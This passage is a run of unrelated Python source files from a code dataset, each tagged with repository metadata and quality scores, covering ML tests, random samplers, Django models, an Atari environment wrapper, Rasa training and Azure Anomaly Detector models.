border_mode=b,
filter_flip=flip)
if gradweight_OK:
self.run_gradweight(inputs_shape=i, filters_shape=f,
output_shape=o, subsample=s,
verify_grad=False, mode=mode, device='cpu',
provide_shape=provide_shape, border_mode=b,
filter_flip=flip)
else:
self.assertRaises(NotImplementedError,
self.run_gradweight,
inputs_shape=i,
filters_shape=f,
output_shape=o,
subsample=s,
verify_grad=False,
mode=mode,
device='cpu',
provide_shape=provide_shape,
border_mode=b,
filter_flip=flip)
if gradinput_OK:
self.run_gradinput(inputs_shape=i, filters_shape=f,
output_shape=o, subsample=s,
verify_grad=False, mode=mode, device='cpu',
provide_shape=provide_shape, border_mode=b,
filter_flip=flip)
else:
self.assertRaises(NotImplementedError,
self.run_gradinput,
inputs_shape=i,
filters_shape=f,
output_shape=o,
subsample=s,
verify_grad=False,
mode=mode,
device='cpu',
provide_shape=provide_shape,
border_mode=b,
filter_flip=flip)
| 2.03125 | 2 |
config.py | eranroz/4suDRB-seq | 1 | 12786259 | # place to download and get, UCSC metadata.
KNOWN_GENES = 'meta_data/clustersWithNames.tsv'
# the data itself - directory of mat files (matlab) with convention REPLICATE_CONDITION_TIME.mat
# where:
# REPLICATE is some unique value (such as 384)
# CONDITION is some short description of condition (such as control)
# TIME is duration we collect the cells (relative to time we washed out the DRB)
TRANSCRIPTION_DATA_DIR = 'mat/'
# where to write the output to
HMM_RESULT_DIR = 'hmm_raw_res/'
ALL_REPLICATES = [] # replicates (OPTIONAL - if you sue the script without specifying replicate)
# ======= OTHER CONFIGURATIONS
MIN_GENE_LENGTH = 35000 # minimum length of genes to take into account. (short genes will be ignored)
jump = 50 # jumps of bins in the matlab array/resolution
min_sequence_length = 500 / jump # minimum sequence length after removing exons. shorter transcripts will be skipped
| 1.796875 | 2 |
randopt/samplers.py | seba-1511/randopt | 115 | 12786260 | <gh_stars>100-1000
#!/usr/bin/env python
import random
import math
from . import RANDOPT_RNG
"""
Here we implement the sampling strategies.
"""
class Sampler(object):
"""
Base class for all samplers.
Note: This class should not be directly instanciated.
"""
def __init__(self, *args, **kwargs):
self.rng = random.Random()
RANDOPT_RNG.random() # Change initial random state
self.rng.setstate(RANDOPT_RNG.getstate())
def sample(self):
raise NotImplementedError('sample() has not been implemented.')
def seed(self, seed_val):
self.rng.seed(seed_val)
def get_state(self):
return self.rng.getstate()
def set_state(self, state):
self.rng.setstate(state)
class Constant(Sampler):
def __init__(self, value):
super(Constant, self).__init__()
self.value = value
def sample(self):
return self.value
class Choice(Sampler):
"""
Samples a value from a given list according to the provided sampler.
Parameters:
* items - (list) itemsm to be sampled.
* sampler - (Sampler) Sampler used to select an item based on its index.
Return type: n/a
Example:
TODO.
"""
def __init__(self, items, sampler=None):
"""sampler is any of the available samplers,
used to sample element's index from the list."""
if sampler is None:
sampler = Uniform()
self.sampler = sampler
self.items = items
self.rng = self.sampler.rng
def sample(self):
i = self.sampler.sample() * len(self.items)
i = int(math.floor(i))
return self.items[i]
class Truncated(Sampler):
"""
Given a sampler, clips the distribution between low and high.
If None, not truncated.
Parameters:
* sampler - (Sampler) Sampler to be truncated.
* low - (float) minimum value to be sampled. Default: None
* high - (float) maximum value to be sampled. Default: None
Return type: n/a
Example:
sampler = Gaussian(0.0, 0.1)
truncated = Truncated(sampler, -0.1, 0.1)
"""
def __init__(self, sampler=None, low=None, high=None):
if sampler is None:
sampler = Uniform()
self.sampler = sampler
self.min = low
self.max = high
self.rng = self.sampler.rng
def sample(self):
val = self.sampler.sample()
if self.min is not None and val < self.min:
val = self.min
if self.max is not None and val > self.max:
val = self.max
return val
class Uniform(Sampler):
'''
Generates a randomly sampled value from low to high with equal probability.
Parameters:
* low - (float) minimum value.
* high - (float) maximum value.
* dtype - (string) data type. Default: float
Return type: n/a
Example:
randopt.Uniform(low=-1.0, high=1.0, dtype='float')
'''
def __init__(self, low=0.0, high=1.0, dtype='float'):
super(Uniform, self).__init__()
self.low = low
self.high = high
self.dtype = dtype
def sample(self):
res = self.rng.uniform(self.low, self.high)
if 'fl' in self.dtype:
return res
return int(res)
class Gaussian(Sampler):
'''
Generates a randomly sampled value with specified mean and std based on a Gaussian distribution.
Parameters:
* mean - (float) mean of Gaussian. Default: 0.0
* std - (float) standard deviation of Gaussian. Default: 1.0
* dtype - (string) data type. Default: float
Return type: n/a
Example:
randopt.Gaussian(mean=0.0, std=1.0, dtype='float')
'''
def __init__(self, mean=0.0, std=1.0, dtype='float'):
super(Gaussian, self).__init__()
self.mean = mean
self.std = std
self.dtype = dtype
def sample(self):
res = self.rng.gauss(self.mean, self.std)
if 'fl' in self.dtype:
return res
return int(res)
class Normal(Gaussian):
pass
class LognormVariate(Sampler):
'''
Generates a randomly sampled value with specified mean and std based on a Log normal distribution.
Parameters:
* mean - (float) mean of Lognormal. Default: 0.0
* std - (float) standard deviation of Lognormal. Default: 1.0
* dtype - (string) data type. Default: float
Return type: n/a
Example:
randopt.LognormVariate(mean=0.0, std=1.0, dtype='float')
'''
def __init__(self, mean=0.0, std=1.0, dtype='float'):
super(LognormVariate, self).__init__()
self.mean = mean
self.std = std
self.dtype = dtype
def sample(self):
res = self.rng.lognormvariate(self.mean, self.std)
if 'fl' in self.dtype:
return res
return int(res)
class BetaVariate(Sampler):
'''
Generates a randomly sampled value with specified mean and std based on a Beta distribution.
Parameters:
* alpha - (float) alpha of beta distribution.
* beta - (float) beta of beta distribution.
* dtype - (string) data type. Default: float
Return type: n/a
Example:
randopt.BetaVariate(alpha=1,beta=1,dtype='float')
'''
def __init__(self, alpha, beta, dtype='float'):
super(BetaVariate, self).__init__()
self.alpha = alpha
self.beta = beta
self.dtype = dtype
def sample(self):
res = self.rng.betavariate(self.alpha, self.beta)
if 'fl' in self.dtype:
return res
return int(res)
class ExpoVariate(Sampler):
'''
Generates a randomly sampled value with lambda based on an exponential distribution.
Parameters:
* lam - (float) lambda of exponential distribution (one divided by desired mean).
* dtype - (string) data type. Default: float
Return type: n/a
Example:
randopt.ExpoVariate(lam=1, dtype='float')
'''
def __init__(self, lam, dtype='float'):
super(ExpoVariate, self).__init__()
self.lam = lam
self.dtype = dtype
def sample(self):
res = self.rng.expovariate(self.lam)
if 'fl' in self.dtype:
return res
return int(res)
class WeibullVariate(Sampler):
'''
Generates a randomly sampled value with specified mean and std based on a Weibull distribution.
Parameters:
* alpha - (float) alpha of Weibull distribution (scale parameter).
* beta - (float) beta of Weibull distribution (shape parameter).
* dtype - (string) data type. Default: float
Return type: n/a
Example:
randopt.WeibullVariate(alpha=1,beta=1,dtype='float')
'''
def __init__(self, alpha, beta, dtype='float'):
super(WeibullVariate, self).__init__()
self.alpha = alpha
self.beta = beta
self.dtype = dtype
def sample(self):
res = self.rng.weibullvariate(self.alpha, self.beta)
if 'fl' in self.dtype:
return res
return int(res)
class ParetoVariate(Sampler):
'''
Generates a randomly sampled value with alpha based on the Pareto distribution.
Parameters:
* alpha - (float) alpha of Pareto distribution (shape parameter).
* dtype - (string) data type. Default: float
Return type: n/a
Example:
randopt.ParetoVariate(alpha=1,dtype='float')
'''
def __init__(self, alpha, dtype='float'):
super(ParetoVariate, self).__init__()
self.alpha = alpha
self.dtype = dtype
def sample(self):
res = self.rng.paretovariate(self.alpha)
if 'fl' in self.dtype:
return res
return int(res)
| 3.65625 | 4 |
Myblog/config/migrations/0002_auto_20180418_2143.py | Family-TreeSY/MyBlog | 5 | 12786261 | <filename>Myblog/config/migrations/0002_auto_20180418_2143.py
# -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2018-04-18 13:43
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('config', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='sidebar',
name='display_type',
field=models.PositiveIntegerField(choices=[(1, 'HTML'), (2, '\u6700\u65b0\u6587\u7ae0'), (3, '\u6700\u70ed\u6587\u7ae0'), (4, '\u6700\u8fd1\u8bc4\u8bba')], default=1, verbose_name='\u5c55\u793a\u7c7b\u578b'),
),
]
| 1.523438 | 2 |
methods/Faster RCNN/remove_no_annotations.py | IvanNik17/Seasonal-Changes-in-Thermal-Surveillance-Imaging | 2 | 12786262 | <reponame>IvanNik17/Seasonal-Changes-in-Thermal-Surveillance-Imaging
import shutil
import os
from xml.dom.minidom import parse
labels_folder = './data/harborfront/test/Apr/outputs/'
labels = os.listdir(labels_folder)
for l in labels:
dom = parse(os.path.join(labels_folder, l))
# Get Document Element Object
data = dom.documentElement
# Get objects
objects = data.getElementsByTagName('object')
if len(objects) <=0 :
shutil.move(os.path.join(labels_folder, l), os.path.join(labels_folder, 'empty' + l)) | 2.515625 | 3 |
tests/test_aaindex1.py | shoz/ProtLearn | 1 | 12786263 | import os
import sys
path = os.environ.get('TRAVIS_BUILD_DIR')
sys.path.insert(0, path+'/protlearn')
import numpy as np
from preprocessing import txt_to_df
from feature_engineering import aaindex1
def test_aaindex1():
"Test AAIndex1"
# load data
df = txt_to_df(path+'/tests/docs/test_seq.txt', 0)
# get aaindex1
aaind1 = aaindex1(df)
# test shape
assert aaind1.shape == (4, 553)
# test some indices
ANDN920101 = np.array([4.3, 4.40555, 4.48714, 4.46])
QIAN880126 = np.array([.01166, -.17111, .05857, -.04333])
KARS160122 = np.array([2.014, 5.48522, 2.789, 1.751])
np.testing.assert_equal(np.round(aaind1['ANDN920101'], 3),\
np.round(ANDN920101, 3))
np.testing.assert_equal(np.round(aaind1['QIAN880126'], 3),\
np.round(QIAN880126, 3))
np.testing.assert_equal(np.round(aaind1['KARS160122'], 3),\
np.round(KARS160122, 3))
# test standardization (zscore)
aaind1_z = aaindex1(df, 'zscore')
# test mean = 0
for i in range(aaind1_z.shape[0]):
assert abs(round(aaind1_z.iloc[:,1].mean())) == 0
# test std --> 1
for i in range(aaind1_z.shape[0]):
assert round(aaind1_z.iloc[:,i].std(), 1) ==\
round(aaind1_z.iloc[:,0].std(), 1)
# test standardization (minmax)
aaind1_mm = aaindex1(df, 'minmax')
# test minimum and maximum
for i in range(aaind1_mm.shape[0]):
assert round(aaind1_mm.iloc[:,i].min()) == 0
assert round(aaind1_mm.iloc[:,i].max()) == 1 | 2.234375 | 2 |
deep_rl/updated_atari_env/updated_atari_env.py | alexcoda/DeepRL | 1 | 12786264 | <reponame>alexcoda/DeepRL
from ale_python_interface import ALEInterface
from gym import spaces
from gym import utils
from gym.envs.atari import AtariEnv
from gym.utils import seeding
import numpy as np
import os
def to_ram(ale):
ram_size = ale.getRAMSize()
ram = np.zeros((ram_size),dtype=np.uint8)
ale.getRAM(ram)
return ram
class UpdatedAtariEnv(AtariEnv):
def __init__(self, rom_path, obs_type, frameskip=(2,5), repeat_action_probability=0., mode=0, difficulty=0):
"""Frameskip should be either a tuple (indicating a random range to
choose from, with the top value exclude), or an int."""
utils.EzPickle.__init__(self, rom_path, obs_type)
assert obs_type in ('ram', 'image')
self.rom_path = rom_path
if not os.path.exists(self.rom_path):
raise IOError('You asked for ROM %s but path %s does not exist'%(game, self.game_path))
self._obs_type = obs_type
self.frameskip = frameskip
# Load new ALE interface, instead of atari-py
self.ale = ALEInterface()
self.viewer = None
# Tune (or disable) ALE's action repeat:
# https://github.com/openai/gym/issues/349
assert isinstance(repeat_action_probability, (float, int)), "Invalid repeat_action_probability: {!r}".format(repeat_action_probability)
self.ale.setFloat('repeat_action_probability'.encode('utf-8'), repeat_action_probability)
self.seed()
# Set mode and difficulty
self.ale.setMode(mode)
self.ale.setDifficulty(difficulty)
self._action_set = self.ale.getMinimalActionSet()
self.action_space = spaces.Discrete(len(self._action_set))
(screen_width,screen_height) = self.ale.getScreenDims()
if self._obs_type == 'ram':
self.observation_space = spaces.Box(low=0, high=255, shape=(128,))
elif self._obs_type == 'image':
self.observation_space = spaces.Box(low=0, high=255, shape=(screen_height, screen_width, 3))
else:
raise error.Error('Unrecognized observation type: {}'.format(self._obs_type))
def seed(self, seed=None):
self.np_random, seed1 = seeding.np_random(seed)
# Derive a random seed. This gets passed as a uint, but gets
# checked as an int elsewhere, so we need to keep it below
# 2**31.
seed2 = seeding.hash_seed(seed1 + 1) % 2**31
# Empirically, we need to seed before loading the ROM.
self.ale.setInt(b'random_seed', seed2)
# Load game from ROM instead of game path
self.ale.loadROM(str.encode(self.rom_path))
return [seed1, seed2]
def _get_image(self):
return self.ale.getScreenRGB()
ACTION_MEANING = {
0 : "NOOP",
1 : "FIRE",
2 : "UP",
3 : "RIGHT",
4 : "LEFT",
5 : "DOWN",
6 : "UPRIGHT",
7 : "UPLEFT",
8 : "DOWNRIGHT",
9 : "DOWNLEFT",
10 : "UPFIRE",
11 : "RIGHTFIRE",
12 : "LEFTFIRE",
13 : "DOWNFIRE",
14 : "UPRIGHTFIRE",
15 : "UPLEFTFIRE",
16 : "DOWNRIGHTFIRE",
17 : "DOWNLEFTFIRE",
}
| 2.515625 | 3 |
grbl/connection.py | pylover/easymove | 0 | 12786265 | import serial
from .proxy import ObjectProxy
class Connection:
current_connection = None
_settings = None
_serial = None
def __init__(self, filename, baudrate=115200, **kw):
self.filename = filename
self.baudrate = baudrate
self.kw = kw
@property
def settings(self):
if self._settings is None:
from .configuration import Settings
self._settings = Settings(self)
return self._settings
def __enter__(self):
self._serial = serial.Serial(self.filename, self.baudrate, **self.kw)
self.__class__.current_connection = self
def __exit__(self, exc_type, exc_value, traceback):
self._serial.close()
self.__class__.current_connection = None
def send(self, data):
self._serial.write(data.encode())
def readlines(self):
data = self._serial.read(10)
connection = ObjectProxy(lambda: Connection.current_connection)
| 2.578125 | 3 |
12_funciones_listas_ej.py | jrg-sln/basic_python | 0 | 12786266 | <filename>12_funciones_listas_ej.py
# -*- coding: utf-8 -*-
##############Ejercicio sobre funciones con listas#######################
'''Ahora que ya sabe manejar las funciones de las listas hacer un programa
que simule el registro de alumnos en una lista y al final la imprima en
forma descendente'''
def alta(c, a):
c.append(a)
return c
def baja(c, b):
del[c[b]]
return c
def main():
alumnos = ["Marco", "Ricardo", "Gladys"]
print "\t\t\t\tBase de datos\nLa base actual es la suiguiente:\n", alumnos
a = "Pepe"
alumnos = alta(alumnos, a)
alumnos = baja(alumnos, alumnos.index('Marco'))
print "\nAhora la base es: "
for i in alumnos:
print i
if __name__ == '__main__':
main()
| 4.09375 | 4 |
project/pad/forms.py | lucrae/pad | 1 | 12786267 | from django import forms
class EntryForm(forms.Form):
body = forms.CharField() | 1.6875 | 2 |
elif_bayindir/phase_1/python_basic_1/day_4/q2.py | CodedLadiesInnovateTech/-python-challenge-solutions | 6 | 12786268 | <gh_stars>1-10
# Question 2
# Count number 4 in a list
list1 = [1, 2, 10, 4, 3, 4, 4, 4, 1, 3, 5]
x = 0
for i in range(len(list1)):
if list1[i] == 4:
x += 1
print("Number of 4 in the list:", x)
| 3.53125 | 4 |
ipbes-ndr/src/ipbes_ndr_analysis/__main__.py | richpsharp/ipbes-analysis | 1 | 12786269 | import os
import sys
import logging
import ipbes_ndr_analysis
LOGGER = logging.getLogger(__name__)
if __name__ == '__main__':
if len(sys.argv) != 3:
LOGGER.error(
"usage: python %s iam_token_path workspace_dir", sys.argv[0])
sys.exit(-1)
raw_iam_token_path = sys.argv[1]
raw_workspace_dir = sys.argv[2]
if not os.path.isfile(raw_iam_token_path):
LOGGER.error(
'%s is not a file, should be an iam token', raw_workspace_dir)
sys.exit(-1)
if os.path.isfile(raw_workspace_dir):
LOGGER.error(
'%s is supposed to be the workspace directory but points to an '
'existing file' % raw_workspace_dir)
sys.exit(-1)
ipbes_ndr_analysis.main(raw_iam_token_path, raw_workspace_dir)
| 2.5625 | 3 |
pangea/core/views/__init__.py | LongTailBio/pangea-django | 0 | 12786270 | <reponame>LongTailBio/pangea-django
from .s3_views import (
S3ApiKeyCreateView,
S3ApiKeyDetailsView,
S3BucketCreateView,
S3BucketDetailsView,
)
from .user_views import (
PangeaUserListView,
PangeaUserDetailsView,
get_user_detail_by_djoser_id,
get_current_user_detail,
)
from .organization_views import (
OrganizationCreateView,
OrganizationUsersView,
OrganizationDetailsView,
)
from .project_views import (
ProjectCreateView,
ProjectDetailsView,
ProjectSampleGroupsView,
)
from .sample_group_views import (
SampleGroupCreateView,
SampleGroupDetailsView,
SampleGroupSamplesView,
get_sample_links_in_group,
get_sample_metadata_in_group,
get_sample_ar_counts_in_group,
get_sample_group_manifest,
get_sample_data_in_group,
generate_sample_metadata_schema,
validate_sample_metadata_schema,
)
from .sample_views import (
SampleCreateView,
SampleDetailsView,
bulk_create_samples,
get_sample_manifest,
get_sample_metadata,
)
from .analysis_result_views import (
SampleAnalysisResultCreateView,
SampleAnalysisResultDetailsView,
SampleGroupAnalysisResultCreateView,
SampleGroupAnalysisResultDetailsView,
SampleAnalysisResultFieldCreateView,
SampleAnalysisResultFieldDetailsView,
SampleGroupAnalysisResultFieldCreateView,
SampleGroupAnalysisResultFieldDetailsView,
post_sample_ar_upload_url,
post_sample_ar_complete_multipart_upload_url,
post_sample_group_ar_upload_url,
post_sample_group_ar_complete_multipart_upload_url,
)
from .pipeline_views import (
PipelineCreateView,
PipelineDetailsView,
PipelineModuleCreateView,
PipelineModuleDetailsView,
PipelineNameDetailsView,
get_module_in_pipeline,
)
from .work_order_views import (
WorkOrderProtoListView,
GroupWorkOrderProtoListView,
WorkOrderProtoRetrieveView,
GroupWorkOrderProtoRetrieveView,
JobOrderProtoListView,
JobOrderProtoRetrieveView,
WorkOrderRetrieveView,
GroupWorkOrderRetrieveView,
JobOrderDetailView,
create_new_work_order,
create_new_group_work_order,
SampleWorkOrdersView,
WorkOrderProtoWorkOrderView,
SampleGroupGroupWorkOrdersView,
GroupWorkOrderProtoWorkOrderView,
) | 1.5 | 2 |
core/train_dm.py | botfront/rasa-for-botfront-old | 1 | 12786271 | import argparse
import glob
import os
import time
import logging
from rasa_addons.domains_merger import DomainsMerger
from rasa_addons.superagent import SuperAgent
from rasa_core.policies.memoization import MemoizationPolicy, AugmentedMemoizationPolicy
from rasa_core.policies.keras_policy import KerasPolicy
from rasa_core.agent import Agent
logger = logging.getLogger()
def concatenate_storyfiles(folder_path, prefix='stories', output='aggregated_stories.md'):
path_pattern = u'{}/{}*.md'.format(folder_path, prefix)
filenames = glob.glob(path_pattern)
with open(output, 'w') as outfile:
for fname in filenames:
with open(fname, 'r') as infile:
for line in infile:
outfile.write(line)
outfile.write("\n")
def train(stories_path, domain_path, policy_path):
root = os.path.dirname(__file__)
domain_path = os.path.join(root, domain_path)
stories_path = os.path.join(root, stories_path)
# generate_questions_data(stories_path, domain_path)
concatenate_storyfiles(stories_path, 'stories', os.path.join(stories_path, 'aggregated_stories.md'))
training_data_file = os.path.join(stories_path, 'aggregated_stories.md')
DomainsMerger(domain_path).merge().dump()
domain_path = os.path.join(domain_path, 'aggregated_domains.yaml')
from rasa_core.featurizers import (MaxHistoryTrackerFeaturizer,
BinarySingleStateFeaturizer)
policies = [
MemoizationPolicy( max_history=3),
KerasPolicy(MaxHistoryTrackerFeaturizer(BinarySingleStateFeaturizer(), max_history=3))
]
agent = SuperAgent(domain_path, policies=policies)
training_data = agent.load_data(training_data_file)
agent.train(training_data, epochs=200, validation_split=0.0)
agent.persist(policy_path)
logging.basicConfig(level="WARN")
def create_argparser():
parser = argparse.ArgumentParser(
description='Trains the bot.')
parser.add_argument('-s', '--stories', help="Stories path")
parser.add_argument('-d', '--domain', help="Domain path")
parser.add_argument('-p', '--policy', help="Policy path")
return parser
if __name__ == "__main__":
debug_mode = True
parser = create_argparser()
args = parser.parse_args()
start_time = time.time()
train(args.stories, args.domain, args.policy)
print("--- %s seconds ---" % (time.time() - start_time))
| 2.046875 | 2 |
sdk/anomalydetector/azure-ai-anomalydetector/azure/ai/anomalydetector/models/_models.py | rsdoherty/azure-sdk-for-python | 2,728 | 12786272 | <filename>sdk/anomalydetector/azure-ai-anomalydetector/azure/ai/anomalydetector/models/_models.py
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.core.exceptions import HttpResponseError
import msrest.serialization
class AlignPolicy(msrest.serialization.Model):
"""AlignPolicy.
:param align_mode: An optional field, indicates how we align different variables into the same
time-range which is required by the model.{Inner, Outer}. Possible values include: "Inner",
"Outer".
:type align_mode: str or ~azure.ai.anomalydetector.models.AlignMode
:param fill_na_method: An optional field, indicates how missed values will be filled with. Can
not be set to NotFill, when alignMode is Outer.{Previous, Subsequent, Linear, Zero, Fix,
NotFill}. Possible values include: "Previous", "Subsequent", "Linear", "Zero", "Pad",
"NotFill".
:type fill_na_method: str or ~azure.ai.anomalydetector.models.FillNAMethod
:param padding_value: optional field, only be useful if FillNAMethod is set to Pad.
:type padding_value: int
"""
_attribute_map = {
'align_mode': {'key': 'alignMode', 'type': 'str'},
'fill_na_method': {'key': 'fillNAMethod', 'type': 'str'},
'padding_value': {'key': 'paddingValue', 'type': 'int'},
}
def __init__(
self,
**kwargs
):
super(AlignPolicy, self).__init__(**kwargs)
self.align_mode = kwargs.get('align_mode', None)
self.fill_na_method = kwargs.get('fill_na_method', None)
self.padding_value = kwargs.get('padding_value', None)
class AnomalyContributor(msrest.serialization.Model):
"""AnomalyContributor.
:param contribution_score: The higher the contribution score is, the more likely the variable
to be the root cause of a anomaly.
:type contribution_score: float
:param variable: Variable name of a contributor.
:type variable: str
"""
_validation = {
'contribution_score': {'maximum': 2, 'minimum': 0},
}
_attribute_map = {
'contribution_score': {'key': 'contributionScore', 'type': 'float'},
'variable': {'key': 'variable', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(AnomalyContributor, self).__init__(**kwargs)
self.contribution_score = kwargs.get('contribution_score', None)
self.variable = kwargs.get('variable', None)
class AnomalyDetectorError(msrest.serialization.Model):
"""Error information returned by the API.
:param code: The error code. Possible values include: "InvalidCustomInterval", "BadArgument",
"InvalidGranularity", "InvalidPeriod", "InvalidModelArgument", "InvalidSeries",
"InvalidJsonFormat", "RequiredGranularity", "RequiredSeries".
:type code: str or ~azure.ai.anomalydetector.models.AnomalyDetectorErrorCodes
:param message: A message explaining the error reported by the service.
:type message: str
"""
_attribute_map = {
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(AnomalyDetectorError, self).__init__(**kwargs)
self.code = kwargs.get('code', None)
self.message = kwargs.get('message', None)
class AnomalyState(msrest.serialization.Model):
"""AnomalyState.
All required parameters must be populated in order to send to Azure.
:param timestamp: Required. timestamp.
:type timestamp: ~datetime.datetime
:param value:
:type value: ~azure.ai.anomalydetector.models.AnomalyValue
:param errors: Error message when inference this timestamp.
:type errors: list[~azure.ai.anomalydetector.models.ErrorResponse]
"""
_validation = {
'timestamp': {'required': True},
}
_attribute_map = {
'timestamp': {'key': 'timestamp', 'type': 'iso-8601'},
'value': {'key': 'value', 'type': 'AnomalyValue'},
'errors': {'key': 'errors', 'type': '[ErrorResponse]'},
}
def __init__(
self,
**kwargs
):
super(AnomalyState, self).__init__(**kwargs)
self.timestamp = kwargs['timestamp']
self.value = kwargs.get('value', None)
self.errors = kwargs.get('errors', None)
class AnomalyValue(msrest.serialization.Model):
"""AnomalyValue.
All required parameters must be populated in order to send to Azure.
:param contributors: If current timestamp is an anomaly, contributors will show potential root
cause for thus anomaly. Contributors can help us understand why current timestamp has been
detected as an anomaly.
:type contributors: list[~azure.ai.anomalydetector.models.AnomalyContributor]
:param is_anomaly: Required. To indicate whether current timestamp is anomaly or not.
:type is_anomaly: bool
:param severity: Required. anomaly score of the current timestamp, the more significant an
anomaly is, the higher the score will be.
:type severity: float
:param score: anomaly score of the current timestamp, the more significant an anomaly is, the
higher the score will be, score measures global significance.
:type score: float
"""
_validation = {
'is_anomaly': {'required': True},
'severity': {'required': True, 'maximum': 1, 'minimum': 0},
'score': {'maximum': 2, 'minimum': 0},
}
_attribute_map = {
'contributors': {'key': 'contributors', 'type': '[AnomalyContributor]'},
'is_anomaly': {'key': 'isAnomaly', 'type': 'bool'},
'severity': {'key': 'severity', 'type': 'float'},
'score': {'key': 'score', 'type': 'float'},
}
def __init__(
self,
**kwargs
):
super(AnomalyValue, self).__init__(**kwargs)
self.contributors = kwargs.get('contributors', None)
self.is_anomaly = kwargs['is_anomaly']
self.severity = kwargs['severity']
self.score = kwargs.get('score', None)
class ChangePointDetectRequest(msrest.serialization.Model):
"""ChangePointDetectRequest.
All required parameters must be populated in order to send to Azure.
:param series: Required. Time series data points. Points should be sorted by timestamp in
ascending order to match the change point detection result.
:type series: list[~azure.ai.anomalydetector.models.TimeSeriesPoint]
:param granularity: Required. Can only be one of yearly, monthly, weekly, daily, hourly,
minutely or secondly. Granularity is used for verify whether input series is valid. Possible
values include: "yearly", "monthly", "weekly", "daily", "hourly", "minutely", "secondly",
"microsecond", "none".
:type granularity: str or ~azure.ai.anomalydetector.models.TimeGranularity
:param custom_interval: Custom Interval is used to set non-standard time interval, for example,
if the series is 5 minutes, request can be set as {"granularity":"minutely",
"customInterval":5}.
:type custom_interval: int
:param period: Optional argument, periodic value of a time series. If the value is null or does
not present, the API will determine the period automatically.
:type period: int
:param stable_trend_window: Optional argument, advanced model parameter, a default
stableTrendWindow will be used in detection.
:type stable_trend_window: int
:param threshold: Optional argument, advanced model parameter, between 0.0-1.0, the lower the
value is, the larger the trend error will be which means less change point will be accepted.
:type threshold: float
"""
_validation = {
'series': {'required': True},
'granularity': {'required': True},
}
_attribute_map = {
'series': {'key': 'series', 'type': '[TimeSeriesPoint]'},
'granularity': {'key': 'granularity', 'type': 'str'},
'custom_interval': {'key': 'customInterval', 'type': 'int'},
'period': {'key': 'period', 'type': 'int'},
'stable_trend_window': {'key': 'stableTrendWindow', 'type': 'int'},
'threshold': {'key': 'threshold', 'type': 'float'},
}
def __init__(
self,
**kwargs
):
super(ChangePointDetectRequest, self).__init__(**kwargs)
self.series = kwargs['series']
self.granularity = kwargs['granularity']
self.custom_interval = kwargs.get('custom_interval', None)
self.period = kwargs.get('period', None)
self.stable_trend_window = kwargs.get('stable_trend_window', None)
self.threshold = kwargs.get('threshold', None)
class ChangePointDetectResponse(msrest.serialization.Model):
"""ChangePointDetectResponse.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar period: Frequency extracted from the series, zero means no recurrent pattern has been
found.
:vartype period: int
:param is_change_point: isChangePoint contains change point properties for each input point.
True means an anomaly either negative or positive has been detected. The index of the array is
consistent with the input series.
:type is_change_point: list[bool]
:param confidence_scores: the change point confidence of each point.
:type confidence_scores: list[float]
"""
_validation = {
'period': {'readonly': True},
}
_attribute_map = {
'period': {'key': 'period', 'type': 'int'},
'is_change_point': {'key': 'isChangePoint', 'type': '[bool]'},
'confidence_scores': {'key': 'confidenceScores', 'type': '[float]'},
}
def __init__(
self,
**kwargs
):
super(ChangePointDetectResponse, self).__init__(**kwargs)
self.period = None
self.is_change_point = kwargs.get('is_change_point', None)
self.confidence_scores = kwargs.get('confidence_scores', None)
class DetectionRequest(msrest.serialization.Model):
"""Request to submit a detection.
All required parameters must be populated in order to send to Azure.
:param source: Required. source file link of the input variables, each variable will be a csv
with two columns, the first column will be timestamp, the second column will be value.Besides
these variable csv files, a extra meta.json can be included in th zip file if you would like to
rename a variable.Be default, the file name of the variable will be used as the variable name.
The variables used in detection should be consistent with variables in the model used for
detection.
:type source: str
:param start_time: Required. A require field, start time of data be used for detection, should
be date-time.
:type start_time: ~datetime.datetime
:param end_time: Required. A require field, end time of data be used for detection, should be
date-time.
:type end_time: ~datetime.datetime
"""
_validation = {
'source': {'required': True},
'start_time': {'required': True},
'end_time': {'required': True},
}
_attribute_map = {
'source': {'key': 'source', 'type': 'str'},
'start_time': {'key': 'startTime', 'type': 'iso-8601'},
'end_time': {'key': 'endTime', 'type': 'iso-8601'},
}
def __init__(
self,
**kwargs
):
super(DetectionRequest, self).__init__(**kwargs)
self.source = kwargs['source']
self.start_time = kwargs['start_time']
self.end_time = kwargs['end_time']
class DetectionResult(msrest.serialization.Model):
"""Anomaly Response of one detection corresponds to a resultId.
All required parameters must be populated in order to send to Azure.
:param result_id: Required.
:type result_id: str
:param summary: Required. Multivariate anomaly detection status.
:type summary: ~azure.ai.anomalydetector.models.DetectionResultSummary
:param results: Required. anomaly status of each timestamp.
:type results: list[~azure.ai.anomalydetector.models.AnomalyState]
"""
_validation = {
'result_id': {'required': True},
'summary': {'required': True},
'results': {'required': True},
}
_attribute_map = {
'result_id': {'key': 'resultId', 'type': 'str'},
'summary': {'key': 'summary', 'type': 'DetectionResultSummary'},
'results': {'key': 'results', 'type': '[AnomalyState]'},
}
def __init__(
self,
**kwargs
):
super(DetectionResult, self).__init__(**kwargs)
self.result_id = kwargs['result_id']
self.summary = kwargs['summary']
self.results = kwargs['results']
class DetectionResultSummary(msrest.serialization.Model):
"""DetectionResultSummary.
All required parameters must be populated in order to send to Azure.
:param status: Required. Multivariate anomaly detection status. Possible values include:
"CREATED", "RUNNING", "READY", "FAILED".
:type status: str or ~azure.ai.anomalydetector.models.DetectionStatus
:param errors: Error message when creating or training model fails.
:type errors: list[~azure.ai.anomalydetector.models.ErrorResponse]
:param variable_states:
:type variable_states: list[~azure.ai.anomalydetector.models.VariableState]
:param setup_info: Required. Request when creating the model.
:type setup_info: ~azure.ai.anomalydetector.models.DetectionRequest
"""
_validation = {
'status': {'required': True},
'setup_info': {'required': True},
}
_attribute_map = {
'status': {'key': 'status', 'type': 'str'},
'errors': {'key': 'errors', 'type': '[ErrorResponse]'},
'variable_states': {'key': 'variableStates', 'type': '[VariableState]'},
'setup_info': {'key': 'setupInfo', 'type': 'DetectionRequest'},
}
